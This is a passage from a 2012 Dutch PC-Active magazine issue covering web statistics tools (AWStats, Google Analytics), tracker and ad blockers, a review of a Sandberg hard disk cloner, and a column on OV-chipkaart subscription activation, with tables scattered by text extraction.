Ghostery Niet geheel ten onrechte noemen de makers van Ghostery de scriptjes die uw surfgedrag bijhouden bugs, overigens niet te verwarren met programmeerfouten. Gelukkig is deze add-on een ster in het bestrijden van deze bugs. Hij is eenvoudig te installeren: we kunnen voor alle populaire en zelfs wat minder populaire browsers een plug-in downloaden en installeren. Na installatie kunnen we aangeven welke trackers en bugs we tijdens het surfen willen weren. De lijst omvat meer dan duizend items en het is uiteraard het makkelijkst om gewoon de hele lijst te blokkeren. Het mooie van Ghostery is dat u precies kunt zien wat de software doet. Desgewenst meldt het programma bij ieder websitebezoek in de rechter bovenhoek wat het allemaal heeft geblokkeerd. Soms verschijnt daar onverwacht een flinke lijst met blokkades. Het is indrukwekkend om te zien hoeveel wordt tegengehouden. We kwamen nauwelijks problemen tegen, maar in zeldzame gevallen functioneert een site niet meer geheel naar behoren. In dat geval kunnen we besluiten een bepaald domein uit te sluiten van eventuele blokkades, of een specifieke bug niet meer te blokkeren. Zowel de installatie van Ghostery als het gebruik van de plug-in is eenvoudig en verliep bij ons probleemloos. Het geeft tijdens het surfen een heerlijk gevoel dat er op de achtergrond geen ongevraagde scripts worden uitgevoerd die derden voorzien van informatie en het surfen zelfs kunnen vertragen. Wij willen eerlijk gezegd niet meer zonder.
bepalen hoe vaak een pagina is opgevraagd, kunnen we niet zonder meer zeggen dat zo’n pagina ook echt door een persoon is bekeken. Het is voor de meeste personen misschien niet zichtbaar, maar mensen zijn niet de enige die pagina’s opvragen. Het wemelt op internet van de bots, crawlers en andere geautomatiseerde processen die aan de lopende band pagina’s opvragen. Zoekmachines vergaren zo informatie om hun database te vullen. En spammers speuren door middel van speciale software naar e-mailadressen die ze kunnen gebruiken voor hun spamcampagnes en naar weblogs die ze kunnen bevuilen met hun grote en kleine boodschappen. Er zijn vast nog wel meer typen bots actief. Een pagina opgevraagd door een mens die een website bekijkt, is - zeker vanuit het perspectief van een adverteerder - veel interessanter dan een pagina opgevraagd door een bot. Bovendien maken sommige grote providers, America Online (AOL) bijvoorbeeld, gebruik van een eigen caching-systeem: wanneer diverse mensen dezelfde pagina opvragen, komt deze niet noodzakelijk van de originele server, maar kan hij ook uit de cache van AOL komen. Gelukkig heeft AWStats genoeg functionaliteit om het bot-verkeer te scheiden van de mense-
lijke bezoekers. Tenminste, als u de oudere Perl-versie op uw server hebt geïnstalleerd, of gebruikmaakt van een patch. De ontdekker van deze bug is onze eigen redacteur Henk en hij legt onder de Infolink meer uit over de achtergronden.
Nog meer verschillen? Wie nu de conclusie trekt dat we met Google Analytics veel preciezer kunnen bijhouden hoe vaak een bepaalde pagina door een persoon wordt bekeken, heeft maar gedeeltelijk gelijk. Het is voor websurfers namelijk niet zo moeilijk om de uitvoer van scripts te blokkeren. Ghostery (zie kader) is bijvoorbeeld een stukje software dat dit klusje voor u kan klaren. Daarnaast is het natuurlijk mogelijk om via een verwijzing in een firewall, de hosts file of een aanpassing van uw eigen DNS-server de toegang tot statistische servers van Google - of een andere script-gebaseerde statistische tool - te weren. Dat is goed voor uw privacy, maar minder prettig voor de webmaster die het bezoek aan zijn site bijhoudt met Google Analytics. Hij ziet niets terug van deze bezoeken, die uiteraard wel in de logfiles op de server geregistreerd staan. Voor AWStats tellen deze bezoeken dus wel gewoon mee.
Ons eigen Analytics-account
84
Analytics.indd 84
PC-ACTIVE | Nr. 262 – 2012
9/6/12 1:06 PM
ONLINE STATISTIEKEN
Een andere interessante statistiek is het aantal bezoeken dat uw site kreeg te verwerken. De vraag is dan: wat telt bij de analyse als een bezoek? AWStats houdt voor het bijhouden van deze cijfers een interval aan van twintig minuten. Met andere woorden: wanneer er tussen de een-na-laatste en de daarop volgende hit vanaf hetzelfde ip-adres minder dan twintig minuten zitten, rekent het programma dit als één bezoek. Is de tijd tussen twee hits langer, dan gaat het programma uit van twee afzonderlijke bezoeken. Binnen bedrijven maken mensen vaak gebruik van hetzelfde ip-adres, zodat bezoeken van verschillende personen binnen twintig minuten toch als één bezoek worden gerekend. En dan is er nog het aantal unieke bezoekers van een site. AWStats maakt in eerste instantie gebruik van de ip-adressen in de logs om het aantal unieke bezoekers te achterhalen. Ook hier weer geldt dat wanneer diverse mensen een site bezoeken vanaf hetzelfde ip-adres, dit in de statistieken slechts één unieke bezoeker oplevert. Wat dat betreft is Google Analytics nauwkeuriger: dat maakt gebruik van een cookie op de computer van de bezoeker. Zo kan Google precies bepalen of het een unieke bezoeker betreft, zelfs ongeacht het ipnummer. Bezoekt u een site met dezelfde laptop, maar vanaf een andere locatie, dan weet Google alsnog dat u dezelfde unieke bezoeker bent. Maar: accepteert u geen cookies, dan wordt het ook voor Google alweer wat moeilijker. Wat overigens niet wil zeggen dat het ip-adres het enige aanknopingspunt is om bij te houden wie nu precies de site heeft bezocht. Aan de hand van browsergegevens over gebruikte lettertypes, versienummers en dergelijke kan een statistisch programma een vingerafdruk samenstellen waarmee het individuele bezoekers alsnog tot op zekere hoogte uit elkaar kan houden.
Welke kiezen we? Het moge duidelijk zijn: de statistieken die een analyseprogramma produceert, zijn sterk afhankelijk van de wijze waarop de gegevens zijn verzameld en hoe ze vervolgens zijn verwerkt. Maar dat betekent niet dat de ene methode betrouwbaarder is dan de andere. De ervaring leert dat de verschillen minder uitgesproken zijn naarmate de sample - in dit geval het gemeten verkeer - groter is. Daarnaast is het belangrijk kennis te nemen van de wijze waarop de statistieken tot stand komen. Alleen dan is het mogelijk zinnige conclusies uit de cijfers te trekken. Een bewering als ‘mijn site heeft tienduizend bezoeken per maand’ zegt op zich niet zo veel. We moeten op zijn minst weten of het dan gaat om mensen, of dat geautomatiseerde bezoeken ook zijn meegeteld. Ook niet onbelangrijk om te weten: hoeveel unieke bezoekers brachten dat totale aantal bezoeken? Kortom: vraag uzelf altijd af wat bepaalde webstatistieken werkelijk betekenen en laat u niet al te gemakkelijk
| ACHTERGROND
Opgeruimd surfen Niet alleen Google Analytics maakt gebruik van een Java-script op de pagina. Er zijn honderden bedrijven die met behulp van kleine scriptjes of andere add-ons uw zoekgedrag bijhouden. U ziet ze niet, maar ze zijn er wel. Facebook weet bijvoorbeeld niet alleen wat mensen vrijwillig over zichzelf prijsgeven, het bedrijf gluurt ook vrolijk naar surfgedrag via scripts op talloze webpagina’s [2]. In de meeste gevallen worden de data verzameld voor marketingdoeleinden en de betreffende bedrijven beloven altijd weer plechtig dat de gegevens worden geanonimiseerd en niet onbeperkt opgeslagen. Maar als gebruiker wordt u tijdens het surfen zelden of nooit gevraagd of u het eens bent met deze praktijken. Verder krijgen we tijdens het surfen ook vaak ongevraagd advertenties gepresenteerd, meestal aangestuurd door de informatie die met behulp van trackers is verzameld. Advertenties zijn op zich al een noodzakelijk kwaad, maar op het web nemen ze soms erg opdringerige vormen aan. Pop-ups die een site compleet blokkeren totdat de gebruiker ze wegklikt of zelfs opdringerige advertenties met veel beweging en geluid worden steeds normaler. Dergelijke advertenties zijn niet alleen irritant, ze kosten ook nog eens de nodige processorkracht. Op zonnige dagen resulteert dat bij ons in een luidruchtige laptop, warm van alle rekenkracht die het advertentiemateriaal opeist. De oplossing? Gebruikers van Chrome en Firefox kunnen heerlijk advertentievrij surfen met behulp van Adblock en/of Adblock Plus. De installatie van beide programma’s is kinderlijk eenvoudig en ze doen keurig wat ze moeten doen. De verschillen tussen de twee zijn minimaal [3]. Sinds we Adblock hebben geïnstalleerd, surfen we advertentievrij en is alle rekenkracht van de laptop weer gewoon helemaal van ons.
hypnotiseren met mooie getallen. Wat u werkelijk met de cijfers wilt, is ook erg bepalend voor de keuze tussen analyse van de logfiles op de server of het bijhouden van statistieken via scripts. Als u er belang aan hecht om het werkelijke dataverkeer in de gaten te houden, bijvoorbeeld om bij te kunnen houden welke bestanden vaak worden gedownload of om een goede inschatting te maken van de totale omvang van de traffic, dan bent u aangewezen op de logfiles en is een programma als AWStats een goede keuze. Gaat het u vooral om betrouwbare cijfers over het aantal werkelijke bezoeken aan de site, bijvoorbeeld voor marketingdoeleinden, dan komt Google om de hoek kijken. In tegenstelling tot de open source-code van AWStats hebben we bij Google Analytics geen inzage in de gebruikte methode, maar we mogen aannemen dat dit bedrijf er alles aan doet om zo betrouwbaar mogelijke producten te leveren. Zelf gebruikt de redactie van PC-Active beide methodes, zodat we altijd kunnen beschikken over de cijfers die op dat moment het meest bruikbaar zijn.
INFOLINK 262007
Voor downloads en meer informatie: http://www.pc-active.nl/262007
PC-ACTIVE | Nr. 262 – 2012
Analytics.indd 85
85
9/6/12 1:06 PM
Sandberg USB 3 Hard Disk Cloner
snel en makkelijk tekst : wammes witkop
Soms wil je even op een los rondslingerende harde schijf kunnen kijken zonder nu meteen de pc open te schroeven. En soms wil je een HD klonen - bijvoorbeeld voordat je herstelwerkzaamheden probeert na een ongelukje met akelige gevolgen. Sinds kort is dat alletwee veel makkelijker geworden.
H
andige apparaten, die kastjes met twee SATA-sleuven waarin je blote harde schijven van 3.5 of 2.5 inch kan insteken, waarna die drives over een USB-kabeltje te benaderen zijn. De manier om een verzameling losse harde schijven die niet voortdurend aangesloten hoeven te zijn, te hanteren, want even de stroom van het kastje en je wisselt zo een HD om tegen een ander exemplaar. Ze bestaan al een tijdje, met één of twee sleuven en zijn echt het ei van Columbus als het om het beheren van losse schijven gaat. En met de juiste software kun je natuurlijk ook die schijven klonen met zo’n apparaat: een exacte kopie maken van alle sectoren, ook zaken als de bootsector waar je normaal gesproken niet makkelijk bij komt. Dé manier om een pc van een grotere harde schijf te voorzien met behoud van alle data: klonen en dan de partitiegroottes weer aanpassen!
Maar ’t kan altijd nog handiger. Want zo’n kastje waar je twee harde schijven in kan steken, zou natuurlijk met een beetje extra intelligentie ook in staat moeten zijn om zelfstandig te klonen, zonder dat er een pc bij komt kijken en al die data via het aansluitkabeltje gelezen en weer geschreven moeten worden. En dat is nu precies wat het Deense bedrijf Sandberg heeft gedaan met zijn USB 3 Hard Disk Cloner; die prettig snelle USB 3.0-aansluiting is helemaal niet nodig om een harde schijf te kopiëren - dat gaat gewoon rechtstreeks van de ene HD naar de andere. Dus niet alleen lekker snel, maar ook zonder dat de pc aan hoeft te staan. En de echte flessenhals bij het klonen die USB-verbinding - wordt omzeild.
Waarom klonen? Natuurlijk doe je het niet dagelijks, een harde schijf klonen. Maar toch, al in de testperiode is dit appa-
Harde schijven Merk
Samsung
Type
HD501LJ
Soort
SATA
Grootte
Gemeten snelheden (MB/s)
snelheid
GB
Sequential
Random 512 KB
Read
Write
Read 38,18
HD
3Gb/s
465,80
79,22
77,77
Western Digital
WD20EFRX (RED)
HD
6Gb/s
1.863,00
152,77
151,88
42,73
Kingston
SH100S3B/240G
SSD
6Gb/s
223,60
171,64
185,93
169,26
Tabel 1: Datadoorvoersnelheden met de Sandberg USB 3 Hard Disk Cloner
86
PC-ACTIVE | Nr. 262 – 2012
Sandberg Cloner.indd 86
9/6/12 1:14 PM
Sandberg USB 3 Hard Disk Cloner
| HARDWARE
Harde schijven Merk
Type
Soort
SATA (snelheid)
Kloontijd
Grootte (MB)
Snelheid (MB/s)
Seagate
Constellation ES.2
HD
6 Gb/s
7u 48m 52s
3.145.728
111,82
Western Digital
Black Caviar
HD
6 Gb/s
2u 42m 34s
1.048.576
107,50
Kingston
HyperX
SSD
6 Gb/s
0u 19m 25s
122.880
105,48
Samsung
HD501LJ
HD
3 Gb/s
2u 15m 0s
512.000
63,21
Western Digital
WD20EFRX (RED)
HD
6 Gb/s
4u 52m 0s
2.097.152
119,70
Tabel 2: Kloontijden met de Sandberg USB 3 Hard Disk Cloner
raat ook heel praktisch van pas gekomen: een vriend meldde zich met een NAS die opeens geen sjoege meer gaf. Zo’n schijf is dan meestal nog wel te benaderen, vanuit Linux, maar dat doe je liever wel met een kopie. Mocht je een foutje maken en de bestandsstructuur overhoop gooien, dan is er geen man overboord en trek je gewoon nog een kopie van het origineel. Overigens bleek in het onderhavige geval na zorgvuldige inspectie de schijf wel te zien, maar blijkbaar had deze NAS op zijn eigen reset gedrukt en daarmee de HD geformatteerd. Ook dan zijn er nog reddingsmogelijkheden, maar zo belangrijk bleek de inhoud nou ook weer niet; de eigenaar zag af van de optie om alle mogelijke data te verzamelen in genummerde bestanden. Terecht, dat uitzoeken is een klus die je niemand toewenst. En hopelijk denkt u niet dat een NAS een back-up overbodig maakt… Ook als je een pc van een grotere harddisk wilt voorzien, is even klonen verreweg de snelste en veiligste oplossing. Want ook dan wil je voor alles eerst alle gegevens compleet met verborgen bestanden exact zo overnemen. De schijf waar de kopie naartoe geschreven wordt, moet wel minstens even groot zijn als de bronschijf, want het proces kopieert gewoon sector voor sector. Vervolgens kan later de partitiestructuur van de kloon worden aangepast om de extra ruimte beschikbaar te maken voor de computer.
Tijdwinst Klonen is per definitie een langdurig proces: de hele harde schijf wordt sector voor sector overgezet, niet alleen de bestanden. Een lege schijf klonen duurt precies even lang als een volle; het hangt gewoon af van het aantal sectoren op de bronschijf. In Tabel 2, kloontijden met de Sandberg USB 3.0 Hard Disk Cloner, staan wat metingen - deels op het internet
Random 4KB
Random 4 KB
Write
Read
Write
Read
Write
45,72
0,56
1,04
0,66
1,10
91,14
0,60
1,92
0,54
1,74
186,31
19,70
32,56
17,27
38,81
qd=1
qd=1
qd=32
qd=32
gevonden, deels zelf verricht met CrystalDiskMark 3.0.1 x64 [1]. Op de al wat oudere Samsung-drives na zitten ze allemaal boven de 100 MB/s, de zeer recente Western Digital RED disks - speciaal voor NAS’en gedacht - halen zelfs bijna 120 MB/s! Ter vergelijking, een moderne snelle 2 TB HD klonen via de SATAaansluitingen van het moederbord kan met een beetje pech tot acht uur kosten - zo bleek afgelopen voorjaar na een rampje met een NAS. Zowat twee keer langer dus. Kortom, de Sandberg kloont niet alleen zonder dat je de pc moet openschroeven en deze vanaf een Linux boot-cd moet starten - de meest gebruikte manier om te klonen voor Windows-gebruikers, als er niet genoeg vrije SATA-aansluitingen zijn om met een tool onder Windows te kunnen werken - maar doet dat nog stukken sneller dan die pc. Dubbel winst, want je kan ook nog doorwerken op de computer, die anders geheel in beslag genomen wordt door het klonen.
Klonen Een kloon is een exacte kopie van het origineel. Althans, qua data. Die kopie moet bit voor bit gelijk zijn, maar mag wel op een grotere schijf worden gezet - dan blijft het niet-gebruikte deel van de kopieschijf gewoon onbeschreven. Maar om nu inderdaad bit voor bit te kopiëren zou wel erg veel tijd kosten, dus werkt het kloonproces op sectorniveau. Een HD-sector beslaat vandaag de dag 4096 bytes - vroeger waren dat er 2048 of nog eerder zelfs maar 512 - en is de kleinste eenheid waarmee gegevens van en naar een harde schijf getransporteerd worden. Over die sectoren heen is weer een logische structuur opgebouwd waarmee wordt vastgelegd welke bestanden waar te vinden zijn, maar als we zo’n schijf sector voor sector kopiëren, is die structuur op de kopie exact gelijk. Overigens, ook dat sector voor sector kopiëren moet niet te letterlijk genomen worden. Er wordt wel degelijk gebufferd bij dat kopiëren, want meer aansluitende sectoren achter elkaar lezen en schrijven gaat nu eenmaal stukken sneller. Linux kent een specifiek commando om harde schijven te klonen: dd if=/dev/sda of=/dev/sdb. Dus wie niet bang is, kan eens na het openschroeven en aansluiten van de beide harde schijven booten vanaf een Linux-cd en, na mounten van de disks, dit commando van stal halen. Reken er op dat een 2 TB disk al snel acht uur bezig is, op een snel moederbord. Onder Windows zijn er speciale tools voor deze klus. Heel bekend is bijvoorbeeld HDClone 4.1 [2]. De gratis versie is beperkt tot 30 MB/s. Daarmee kost die 2 TB dan zo’n twintig uur. Voor twintig euro schaft u een twee keer snellere variant aan. Wie geen kunstmatige snelheidsbeperkingen blieft, legt 99 euro neer.
PC-ACTIVE | Nr. 262 – 2012
Sandberg Cloner.indd 87
87
9/6/12 1:14 PM
HARDWARE
| SANDBERG USB 3 HARD DISK CLONER
Rode HD’s? Om de snelheid van dit soort apparaten te kunnen vaststellen heb je goede HD’s nodig. Sommige metingen komen van het internet, maar je wilt ook zelf zaken borgen. En dus moet je dan op zoek naar zo snel mogelijke harde schijven. Gelukkig is er vaak wel even wat te regelen met de fabrikanten en importeurs: al snel verscheen een doosje met daarin twee prachtige Western Digital RED WD20EFRX NAS Hard Drives. Flinke jongens, 2 TB per stuk, en inderdaad prettig snel, zoals ook in Tabel 1 valt terug te vinden. De sequentiële lees- en schrijfsnelheid doet eigenlijk nauwelijks onder voor de ook opgenomen SSD, waarmee deze rode schijven een nette prestatie neerzetten. Rode schijven? Jazeker, Western Digital heeft een nieuwe strategie bedacht als het gaat om het kenmerken van haar producten. Sinds kort hebben ze die in vier groepen ingedeeld en elke groep is door een kleur gekenmerkt, een kleur die ook op het label op de HD terugkomt. WD Red is speciaal voor NAS-toepassingen, zou getest zijn binnen NAS-apparaten en is volgens WD geoptimaliseerd voor wat betreft energieverbruik en prestaties. WD Green is ‘koel, stil, milieuvriendelijk’, WD Blue staat voor ‘solide prestaties en betrouwbaarheid voor alledaags gebruik’ en WD Black claimt ‘maximale prestaties voor veeleisend gebruik’.
Losse disks En mocht u nu even net geen harde schijven te repareren hebben - wat een pech! - dan kan het kastje met USB 3.0 op de pc aangesloten worden, waarna er tot twee HD’s gewoon in de Windows Verkenner verschijnen. ’t Ziet er niet alleen heel interessant uit op het bureau, het werkt ook nog eens uistekend en vooral: heel snel. Zie Tabel 1: datadoorvoersnelheden met de Sandberg USB 3 Hard Disk Cloner. Rechtstreeks aangesloten op de SATA III headers van het moederbord zal het niet sneller uitpakken; dit is maximaal.
Gebruiksgemak Het sector voor sector kopiëren van een harde schijf is met dit apparaat een fluitje van een cent. De losse stroomadapter aansluiten, beide HD’s plaatsen, apparaat aanzetten met een drukknopje en vervolgens
Van binnen Natuurlijk hebben we de schroevendraaier erbij gepakt. En ook van binnen is dit apparaat mooi: een klein printje met prima soldeerwerk. Een paar fikse chips vielen op, zoals de PL2773 / G10451A / AQJTW1000. Dit blijkt een SuperSpeed USB 3.0 & eSATAII to SATAII Bridge Controller, Serial ATA Revision 3.0 Specification Compliant 6 Gbits/s. Kortom, het kloppend hart als het gaat om de gemeten mooie snelheden, want deze chip is meteen ook de processor als het gaat om autonoom klonen. Dan zagen we de cFeon F05-100GIP / 115H27B. Dit is geheugen, serial flash memory, waarin de programmering van het apparaat vermoed mag worden. Flash, dus zouden er gewoon nieuwe versies van de firmware moeten kunnen komen. De volgende was de FR9888 / G1143 / 1A13D: een slimme voedingschip die voltages tussen de 4,5 V en de 23 V reguleert en daarbij tot 3,5 Ampère kan verwerken. Goed om te zien; zo’n overbemeten voeding kan nooit kwaad.
88
Sandberg USB 3.0 Hard Disk Cloner Prijzen rond de € 65,http://www.sandberg.it/nl-nl/product/Hard-Disk-Cloner
gedurende drie seconden de startknop ingedrukt houden. Tijdens het proces wordt de voortgang door een reeks led’jes aangegeven, maar dat blijkt met slechts vijf leds vrij grof. Uiteindelijk is het toch afwachten tot de laatste dooft… Als aansluitpunt voor extra harde schijven aan de pc is het zowat nog eenvoudiger: de USB 3.0-kabel bijprikken en aanzetten maar, waarna al snel de beide harde schijven zich melden. Maar er was wel een minpuntje: het stroomverbruik. Alleen al de losse stroomvoorziening, terwijl de diskkloner nog uitgeschakeld is, gebruikt 15 mA - zeg zowat 3,5 Watt. Dat is vrij hoog, want al die stroom verdwijnt in de vorm van warmte. Zodra het apparaat aan staat, loopt dit op tot 18 mA; met twee werkende HD’s aan boord wordt het zo’n 100 mA, 23 Watt. Tijdens het klonen maten we maximaal 116 mA. Kortom, er valt veel voor te zeggen het apparaat niet alleen uit te schakelen als het niet nodig is, maar ook de stekker uit het stopcontact te halen. Tijdens de test liepen we trouwens nog tegen een onverwacht probleempje op: het leek er toch echt op of slechts één van de beide sleuven onder Windows wilde werken. De tweede harde schijf kwam wat we ook deden niet in de Verkenner in beeld. Pas na enig nadenken en eens gaan spitten in het diskbeheer kwam de aap uit de mouw: we hadden eerst een HD gekloond, waarna we met het origineel en die kloon wilden zien dat ze beide benaderbaar waren. Windows weigert dat, die accepteert geen twee harde schijven die precies gelijk zijn: dat heet dan een signature collision [3]. Die handtekening is een vier bytes lange unieke waarde die in het Master Boot Record is opgeslagen - en zodra we die gewijzigd hadden, werkte alles als een zonnetje. Tegen die tijd hadden we dus ook de ondersteuning van Sandberg - ondanks het feit dat de website op .it eindigt, zit men in Denemarken en konden we ook in het Nederlands mailen - kunnen uitproberen. Men antwoordde prettig vlot, maar dit probleem bleek ook voor hen te onverwacht.
INFOLINK 262013
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262013
PC-ACTIVE | Nr. 262 – 2012
Sandberg Cloner.indd 88
9/6/12 1:16 PM
OPZETTELIJKE VALKUILEN?
COLUMN
WAMMES WITKOP
I
k ken Lis onderhand dik veertig jaar - de eerste keer dat we elkaar tegenkwamen was in Kopenhagen, in 1969. Leuke tijden, om de hippie uit te hangen daar. Maar de zomer daarop was ik toch wel wat verbaasd toen een vriendje me in het Vondelpark aansprak en zei dat hij net gehoord had dat bij mijn ouders een Deens meisje had aangebeld, aan wie mijn vader vervolgens de logeerkamer had aangeboden. Ik wist even werkelijk niet wie van al die Deensen me naar huis gevolgd kon hebben. Maar sindsdien logeert Lis elke zomer een paar weken bij mij, ook dit jaar weer. En als fervent fotografe reist ze heel wat af tijdens die vakanties, met de camera in de trein. De strippenkaart was even uitleggen, ooit, maar de ov-chipkaart leek probleemloos te gaan. Hoewel… Toen ik Lis naar de trein bracht voor de thuisreis via Schiphol, ging het mis. Bij het inchecken meldde de machine dat er te weinig saldo zou zijn. En dat terwijl Lis de dag daarvoor nog had gecheckt: er stond ruim twaalf euro op. Ruimschoots meer dan het minimum saldo van een tientje, dat de NS vereist voor een reis met voordeelurenabonnement. De paniek sloeg toe; het vliegtuig zou vast niet wachten. Een door ons aangesproken NS’er bracht uitkomst: het voordeelurenabonnement was niet geactiveerd. Nadat hij dat in orde had gebracht, kon Lis alsnog inchecken en zette ik haar op de trein. Ze liep wel te mopperen, want bij aankomst was ze op de luchthaven langs de NS-balie geweest om euro’s op haar kaart te zetten en had de baliemedewerker haar verzekerd dat alles in orde was zo. Blijkbaar niet: ze had wel degelijk het volle pond betaald voor haar treinreizen en de veertig procent korting - waar wel voor betaald was - misgelopen. Dat werd nog een leuk achterhoedegevecht, waar ik misschien later wel eens over zal berichten. Want waar het me nu om gaat, is dat verplicht handmatig activeren van dat voordeelurenabonnement. Je hebt de ov-chipkaart, je betaalt keurig het abonnement en vervolgens moet je ook nog eens zelf bij een automaat dat abonnement activeren - en als je dat niet weet, of als de baliemedewerker dat voor jou over het hoofd ziet, dan is het met die korting helaas pindakaas. Anderzijds, de NS meldt dat de reiziger na opzegging niets hoeft te doen: “Uw Voordeelurenabonnement wordt automatisch gedeactiveerd.” ’t Kan dus wel, dat abonnement manipuleren tijdens het gewone
gebruik van de kaart. Waarom dan die extra handeling om een middels betaling verlengd abonnement bewust te moeten activeren? Zo lastig kan dat toch niet zijn? Ik kan eigenlijk maar één reden bedenken waarom hier voor is gekozen: boze opzet. Een valkuil waar ongetwijfeld dagelijks mensen in tuimelen die dan vrolijk door deze struikroverij hun veertig procent korting, waar ze wel degelijk voor betaald hebben, mislopen. Ronduit een schoftenstreek, wat mij betreft. Mocht ik het mis hebben, leg het me uit. En ja, ik *weet* dat deze stukkies worden gelezen door diegenen die de antwoorden hebben… Overigens heeft de NS vorig jaar op aandringen van reizigersclub Rover toegezegd dat het activeren per 26 november niet langer noodzakelijk zal zijn. Maar ze hadden dus wel onwaarschijnlijk veel maanden nodig om dat technisch te realiseren - nog even wat geld ‘verdienen’, is dan mijn verdenking. En als klap op de vuurpijl moet de reiziger dan wel eenmalig een ‘nietmeer-jaarlijks-activeren-product’ activeren. Wat mij betreft resteren er twee opties betreffende degene(n) die hier voor verantwoordelijk zijn: ontslag wegens incompetentie of ontslag wegens oplichterspraktijken. Terugkijkend naar het hele ov-chipkaartgebeuren kan ik slechts concluderen dat de volstrekt terechte kritiek die velen hadden en hebben op dit monstrum door de verantwoordelijken keurig onder tafel is gemoffeld en onschadelijk gemaakt. Er is geen moment geluisterd of zelfs maar overwogen systeemfouten te verbeteren, er is slechts ontkend en als dat niet meer mogelijk was, gebagatelliseerd. Zulks gecombineerd met politici die elke verantwoordelijkheid ontlopen - ook zij hopen op leuke baantjes, na de carrière in Den Haag? - levert ronduit bedroevende resultaten op. Jammer, dat feiten als niet ter zake doende terzijde worden geschoven, dat ook in ons land fact free politics bedreven wordt. Nogmaals, mocht u na lezen van deze column de stoom uit de oren spuiten en u me eens haarfijn willen uitleggen waarom zo’n voordeelurenabonnementactivatie geen botte geldklopperij zou zijn: ik ben makkelijk bereikbaar en hoogst benieuwd. Maar ik ga er maar geen tijd voor vrijhouden, want ik vermoed dat doodzwijgen een bewuste keuze is als zaken nu eenmaal niet uit te leggen zijn.
PC-ACTIVE | Nr. 262 – 2012
Column Wammes.indd 89
89
9/6/12 1:17 PM
INFOLINKS
Aan het eind van de meeste artikelen in PC-Active vindt u een blokje met een Infolink. Deze is voorzien van een nummer, welke u op www.pc-active.nl kunt invoeren in het speciale Infolink-invoerveld. U kunt de link ook handmatig invoeren of gebruik de QR-code. Achter de Infolink vindt u meer informatie over het betreffende artikel op onze website. Dat kan gaan om een bronvermelding, maar ook om downloads of een bijzondere lezersaanbieding. De infolinks zijn nog in bèta, dus uw suggesties blijven welkom!
INFOLINK 262262
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262262
COLOFON
Dit tijdschrift is een uitgave van PC-Active BV
HOOFDREDACTIE: Jeroen Geelhoed, Henk van de Kamer en Wammes Witkop EINDREDACTIE: Jaap de Wreede TECHNISCHE REDACTIE EN WEBSITE: Mark Gamble VORMGEVING: Daniel Amoako FOTOGRAFIE: Ton Bloetjes (Bloonie Fotografie) MEDEWERKERS AAN DIT NUMMER: Pieter-Cornelis Avonts, Wim Blanken, David Boelee, Henk van Ess, Jeroen Horlings, Toine Kamphuis, Paul Mulder, Hans Niepoth, Henny van der Pluijm, Jan Roza, Ronald Smit, Koen Vervloesem en Brenno de Winter UITGEVER: Wouter Hendrikse TRAFFIC: Marco Verhoog MEDIACONTROLLER: Bob Bottelier en Mirella van der Willik BOEKHOUDING: Geeta Hobo, René de Muijnck en Irene Prass MARKETING: Judith Sturk en Marjolein Sturk SALES: Aart van der Giezen, Ivo Meijer en Janet Robben REDACTIEADRES: PC-Active, Postbus 3389, 2001 DJ Haarlem Telefoon: 023-543 00 00, Fax 023-535 96 27 E-mail:
[email protected] Persberichten per e-mail:
[email protected] ADVERTENTIE-EXPLOITATIE: HUB Uitgevers Ivo Meijer Postbus 3389, 2001 DJ Haarlem E-mail:
[email protected] Telefoon: 023-543 00 24, Fax: 023-535 96 27 DRUK: Senefelder Misset BV, Doetinchem DISTRIBUTIE: Nederland: Betapress BV, Gilze, Tel. 0161-45 78 00 België: Imapress N.V., Turnhout, Tel. 014-42 38 38 ISSN 0925-5745
na voorafgaande schriftelijke toestemming van de uitgever. Tenzij uitdrukkelijk anders is overeengekomen, heeft de redactie het recht om vrijelijk te beschikken over alle haar toegezonden materiaal. ABONNEMENTEN: Ingrid van der Aar, Tanja Ekel, Eefje van Es en Marja Haakmeester VOOR VRAGEN OVER UW ABONNEMENT OF ADRESWIJZIGINGEN: PC-Active T.a.v. abonnementenadministratie Postbus 3389, 2001 DJ Haarlem E-mail:
[email protected] Fax: 023-545 18 43 Telefoon op werkdagen tussen 10.00 en 14.00 uur: 023-536 44 01 PC-ACTIVE OP HET WEB http://www.pc-active.nl/ http://twitter.com/pcactive http://www.facebook.com/PCActive http://www.youtube.com/PCActiveTeam http://www.hetlab.tk/ Opgeven van een abonnement of nabestellen van oude nummers kan via de website: http://www.hubstore.nl/ PC-Active verschijnt 11 maal per jaar, en een jaarabonnement kost € 66,- (België: € 71,50). Een nieuw abonnement wordt gestart met de eerst mogelijke editie voor een bepaalde duur. Het abonnement zal na de eerste (betalings)periode stilzwijgend worden omgezet naar abonnement van onbepaalde duur, tenzij u uiterlijk één maand voor afloop van het initiële abonnement schriftelijk (per brief, mail of fax ) opzegt. Na de omzetting voor onbepaalde duur kan op ieder moment schriftelijk worden opgezegd per wettelijk voorgeschreven termijn van 3 maanden. © 2012
Uiterste zorg wordt besteed aan het vervaardigen van PC-Active. Desondanks zijn fouten niet uit te sluiten. De uitgever kan derhalve niet aansprakelijk worden gesteld voor eventuele fouten in artikelen, programma’s of advertenties. Overname van artikelen of andere redactionele bijdragen is slechts toegestaan
90
PC-ACTIVE | Nr. 261 – 2012
Lezersservice.indd 90
9/6/12 5:46 PM